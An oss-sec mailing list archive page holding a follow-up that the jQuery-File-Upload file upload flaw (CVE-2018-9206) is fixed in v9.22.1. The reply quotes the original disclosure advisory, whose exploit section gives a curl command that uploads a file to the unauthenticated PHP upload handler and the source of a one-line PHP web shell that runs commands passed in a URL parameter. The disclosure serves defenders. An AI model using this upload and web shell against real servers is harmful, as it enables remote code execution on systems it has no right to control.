oss-sec mailing list archives
Re: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Sat, 13 Oct 2018 22:11:41 -0400
Hello All, This has been fixed in v9.22.1. Larry From: "Larry W. Cashdollar" <larry0 () me com> Reply-To: Open Security <oss-security () lists openwall com> Date: Thursday, October 11, 2018 at 12:07 PM To: Open Security <oss-security () lists openwall com> Subject: [oss-security] jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2018-10-09 CVE-ID:[CVE-2018-9206] Download Site: https://github.com/blueimp/jQuery-File-Upload/ Vendor: https://github.com/blueimp Vendor Notified: 2018-10-09 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=204 Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. Vulnerability: The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution. Exploit Code: $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php Where shell.php is: <?php $cmd=$_GET['cmd']; system($cmd); ?> Screen Shots: Notes: Actively being exploited in the wild. https://github.com/blueimp/jQuery-File-Upload/pull/3514
Current thread:
- jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Larry W. Cashdollar (Oct 11)
- Re: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Larry W. Cashdollar (Oct 13)